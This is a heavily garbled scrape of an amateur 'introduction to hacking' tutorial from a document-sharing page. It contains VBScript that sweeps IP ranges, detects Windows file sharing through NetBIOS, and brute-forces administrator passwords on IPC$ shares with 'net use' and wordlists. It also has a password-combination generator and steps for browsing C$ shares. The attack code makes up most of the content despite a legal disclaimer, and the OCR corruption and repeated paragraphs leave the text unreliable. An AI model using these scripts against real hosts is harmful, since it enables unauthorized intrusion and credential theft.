0 penilaian0% menganggap dokumen ini bermanfaat (0 suara)
53 tayangan7 halaman
His tutoria! contains "asic techni ues of hacking# can "e usefu! for computer users and information securit+ professiona!s to understand how it works and to "e aware of it.. He hacking is activit+ of searching for computers services or ports on the network# when the hosts are identified ne6t steps are scanning for ports and services.
His tutoria! contains "asic techni ues of hacking# can "e usefu! for computer users and information securit+ professiona!s to understand how it works and to "e aware of it.. He hacking is activit+ of searching for computers services or ports on the network# when the hosts are identified ne6t steps are scanning for ports and services.
His tutoria! contains "asic techni ues of hacking# can "e usefu! for computer users and information securit+ professiona!s to understand how it works and to "e aware of it.. He hacking is activit+ of searching for computers services or ports on the network# when the hosts are identified ne6t steps are scanning for ports and services.
info@igprogram.tk http://www.igprogram.tk his tutoria! is free for use and distri"ution as it is# cannot "e changed or used for commercia! purposes. $ontent Introduction.........................................................................................................................................% % &canning............................................................................................................................................% 2 $racking............................................................................................................................................' ( Hacking..............................................................................................................................................) Introduction his tutoria! is introduction to Hacking. he tutoria! contains "asic techni*ues of hacking# can "e usefu! for computer users and information securit+ professiona!s to understand how it works and to "e aware of it. Hacker is individua! who "reaks into information s+stems. ,sua!!+ are two categories of hackers# ethica! -white. hackers who are authori/ed to test information s+stems# and ma!icious -"!ack. hackers who "reak information s+stem for ma!icious purposes. Hacking is activit+ of "reaking into information s+stems with scanning enumeration cracking and simi!ar techni*ues. Previous tutoria! show "asic techni*ues of hacking with separated "atch scripts. his tutoria! automates the processes of scanning and cracking in one script with 01&cript programming !anguage.
2inks: 01&3dit: http://www.v"sedit.com IP ranges 3,: http://www.ripe.net 4ttention5 ,nauthori/ed hacking is against !aws and it is prosecuted "+ the authorities. 4uthori/ed hacking has to "e e6p!icit!+ re*uested and confirmed with documents. 4uthor is not responsi"!e for inappropriate or ma!icious use of this tutoria!. % &canning &canning is the activit+ of searching for computers services or ports on the network. he first steps of hackers are activities of scanning# the+ scan the network in research of computers# when the hosts are identified ne6t steps are scanning for ports and services. % Ping is the command !ine uti!it+ for network testing# it send re*uest to host on the network and if the host is avai!a"!e rep!a+ is received. ping %72.%)8.%.%2 9esu!t: Pinging %72.%)8.%.%2 with (2 "+tes of data: 9ep!+ from %72.%)8.%.%2: "+tes:(2 time;%ms 2:%28 9ep!+ from %72.%)8.%.%2: "+tes:(2 time;%ms 2:%28 9ep!+ from %72.%)8.%.%2: "+tes:(2 time;%ms 2:%28 9ep!+ from %72.%)8.%.%2: "+tes:(2 time;%ms 2:%28 Ping statistics for %72.%)8.%.%2: Packets: &ent : '# 9eceived : '# 2ost : < -<= !oss.# 4ppro6imate round trip times in mi!!i-seconds: >inimum : <ms# >a6imum : <ms# 4verage : <ms 01&cript script can "e used to scan range of IP addresses. he fo!!owing e6amp!es scan range of IP addresses and if hosts are discovered the IP is passed to the ne6t procedure. ?&can IP9ange and for each ip ca!! IP&can procedure &u" IP9ange&can-iprange. @im ip# iparra+# ipstart# ipend# resu!t ?&p!it IP9ange iparra+ : &p!it-iprange# A-A. ipstart : &p!it-rim-iparra+-<..#A.A. ipend : rim-iparra+-%.. ?&can first ip ip : Boin-ipstart# A.A. IP&can ip ?2oop IP9ange resu!t : -% Chi!e resu!t ; < ipstart-(. : ipstart-(. D % Eor i : ,1ound-ipstart. o % &tep - % If ipstart-i. F 2G) hen ipstart-i. : < ipstart-i-%. : ipstart-i-%. D % 3nd If He6t ip : Boin-ipstart# A.A. IP&can ip ?$a!! IP&can procedure for furter processing resu!t : &tr$omp-IPEi!!-ip.# IPEi!!-ipend.. ?$heck if done Cend 3nd &u" 2 ?Ping ip address# if there is rep!+ ca!! Het1ios&can procedure &u" IP&can-ip. @im e6ec# response# resu!t ?3cho current status ip$urrent : ip ip$ount : ip$ount D % 3cho2 ?Ping ip and check resu!t &et e6ec : she!!.36ec-Aping -n % -! % -w %<< A I ip. response : 2$ase-e6ec.&tdJut.9ead4!!. resu!t : -In&tr-response# Att!A. F <. ?tt! : ping rep!+ If resu!t hen scans$ount : scans$ount D % outputEi!e.Crite2ine ip I v"a" I APing 9ep!+A Het1ios&can ip ?$a!! Het1ios&can procedure 3nd If 3nd &u" Cindows operating s+stem has Ei!e and Printer &haring service# this service is accessed "+ Het1ios and $P protoco!s# and ports %(7 or ''G. H"tstat is command !ine too! for diagnostic of Het1ios service. If the resu!t of this too! contains ;2<F then tested host has avai!a"!e Ei!e and Printer &haring service. n"tstat -4 %72.%)8.%.%2 9esu!t: Het1IJ& 9emote >achine Hame a"!e Hame +pe &tatus --------------------------------------------- CIH@JC&KP ;<<F ,HIL,3 9egistered CJ9MG9J,P ;<<F G9J,P 9egistered CIH@JC&KP ;2<F ,HIL,3 9egistered CJ9MG9J,P ;%3F G9J,P 9egistered CJ9MG9J,P ;%@F ,HIL,3 9egistered ..NN>&19JC&3NN.;<%F G9J,P 9egistered Eo!!owing script scan IP and check if host has Ei!e and Printer &ervice avai!a"!e# if found ca!! the successive procedure with that IP. ?&can ip for Ei!e &haring through Het1ios and ca!! $rack procedure &u" Het1ios&can-ip. @im e6ec# response# resu!t &et e6ec : she!!.36ec-An"tstat -4 A I ip. ( response : 2$ase-e6ec.&tdJut.9ead4!!. resu!t : -In&tr-response# A;2<FA. F <. ?;2<F Ei!e sharing If resu!t hen cracks$ount : cracks$ount D % outputEi!e.Crite2ine ip I v"a" I AEi!e &haringA $rack ip ?$a!! $rack procedure 3nd If 3nd &u" 2 $racking Password cracking is the process of repeated!+ guessing for the password. Cindows operating s+stem has defau!t shares as IP$O# $O and 4dminO that are avai!a"!e with Ei!e and Printer &haring service over Het1ios. 4ccess to operating s+stem resources are checked "+ the operating s+stem# correct credentia!s as user and password are needed for successfu! access. Het use command is used to manage shared resources# usua!!+ to connect to network resources. he fo!!owing command tr+ to access the IP$O share on remote host. net use PP%72.%)8.%.%2PipcO /u:A4dministratorA ApasswordA 9esu!t: &+stem error %(2) has occurred. 2ogon fai!ure: unknown user name or "ad password. -- $orrect user and password are needed to successfu!!+ access the host resources. Eo!!owing e6amp!e use !ist of users and passwords from fi!es ,sers.t6t and Passwords.t6t for password cracking# if correct password is found the command is written in fi!e HackJutput.t6t Ei!e: ,sers.t6t 4dministrator Ei!e: Passwords.t6t password% password2 password( password' passwordG password) &u" $rack-ip. @im usersEi!e# passwordsEi!e# e6ec# response# resu!t# command ?Jpen users fi!e and !oop for each user &et usersEi!e : fso.Jpene6tEi!e-A.P,sers.t6tA# Eor9eading. @o ,nti! usersEi!e.4t3ndJf&tream ' user$urrent : usersEi!e.9ead2ine
?Jpen passwords fi!e and !oop for each password &et passwordsEi!e : fso.Jpene6tEi!e-A.PPasswords.t6tA# Eor9eading. @o ,nti! passwordsEi!e.4t3ndJf&tream password$urrent : passwordsEi!e.9ead!ine ?r+ to crack and check resu!t command : Anet use PPA I ip I APIP$O /u:AAA I user$urrent I AAA AAA I password$urrent I AAAA &et e6ec : she!!.36ec-command. response : e6ec.&td3rr.9ead4!!-. resu!t : -2en-response. : <. 3cho2 If resu!t hen ? Crite resu!t to fi!e outputEi!e.Crite2ine command hacks$ount : hacks$ount D % 36it @o 3nd If 2oop PasswordsEi!e.$!ose 2oop usersEi!e.$!ose user$urrent : AA password$urrent : AA 3nd &u" $ommand 36amp!e: $&cript Hacks.v"s %72.%)8.%.<-%72.%)8.%.%<< 9esu!t: net use PP%72.%)8.%.%2PipcO /u:A4dministratorA ApasswordGA he password is cracked# access to host %72.%)8.%.%2 is successfu! with user: 4dministrator and password: passwordG Eor "rute force attack the hackers use set of common passwords# or passwords generated from set of s+m"o!s with appropriate a!gorithm. Eo!!owing script is part of script Pass.v"s# it is e6amp!e of a!gorithm for password generation from set of s+m"o!s. ?Generate passwords com"inations and write output to disp!a+# or a!so in fi!e ?--- Parameters configuration --- ?Password &+m"o!s &+m"o!s : Aa"cdefghijk!mnop*rstuvw6+/A ?&+m"o!s : Aa"cdefghijk!mnop*rstuvw6+/<%2('G)Q87A ?&+m"o!s : A41$@3EGHIBM2>HJPL9&,0CKRS<%2('G)Q87A 2ength : ( ?Password 2ength G CriteoEi!e : Ea!se ?Passwords a!so written to fi!e# true or fa!se @e!a+ : < ?% >i!!isecond @e!a+ to "e visi"!e on @isp!a+# < fast ?-------------------------------------------------- ?Generate passwords com"inations and write output to disp!a+# or a!so in fi!e &u" Passwords-. count : < start : How-. password : AA ?Generate password com"inations Eor i : < o count>a6 ?Eor each com"ination inde6es-<. : inde6es-<. D % ?Incremet first e!ement Eor inde6 : < o ,1ound-inde6es. ?Eor each e!ements in &+m"o!s If inde6es-inde6. : 2en-&+m"o!s. hen ?If e!ement com"inations done inde6es-inde6. : < ?9eset inde6 to < If inde6 ; ,1ound-inde6es. hen ?If not !ast e!ement ?Increment the ne6t e!ement inde6es-inde6D%. : inde6es-inde6D%. D % 3nd If 3nd If He6t ?Print resu!t password : &tr9everse-GetPass-.. count : count D % ?&!eep T mi!!iseconds# to "e visi"!e on disp!a+ C&cript.&!eep @e!a+ ?Print output to disp!a+ C&cript.&tdJut.Crite A$ounter: A I count I A/A I N count>a6 D % I A U ime: A I N $@ate-How-. - start. I A U A I N password I $hr-%(. ?Print output to fi!e If CriteoEi!e hen outputEi!e.Crite2ine password 3nd If He6t 3nd &u" 9esu!t: $ounter: %82Q8/%82Q8 U ime: <<:<<:<2 U /// ( Hacking Hacking of compromised host can consist of different activities# as access to important information# e6tracting passwords or insta!!ing sp+ware programs. Het view command shows the shared resources on remote host: net view PP%72.%)8.%.%2 ) he same resu!ts can "e o"tained in Cindows 36p!orer# just insert PP%72.%)8.%.%2 in address "ar. o access shares fi!es and fo!ders# insert PP%72.%)8.%.%2P$O in Cindows 36p!orer address "ar. Hote: Hacking techni*ues in this tutoria! are ver+ simp!e and primitive just for demonstration. here are !ot of much powerfu! techni*ues and too!s even for free on internet# and who know what e!se e6ists. &o the recommendation is shie!ds a!wa+s up 5 Ivica Gjorgjievski - IGProgram info@igprogram.tk http://www.igprogram.tk his tutoria! is free for use and distri"ution as it is# cannot "e changed or used for commercia! purposes. Q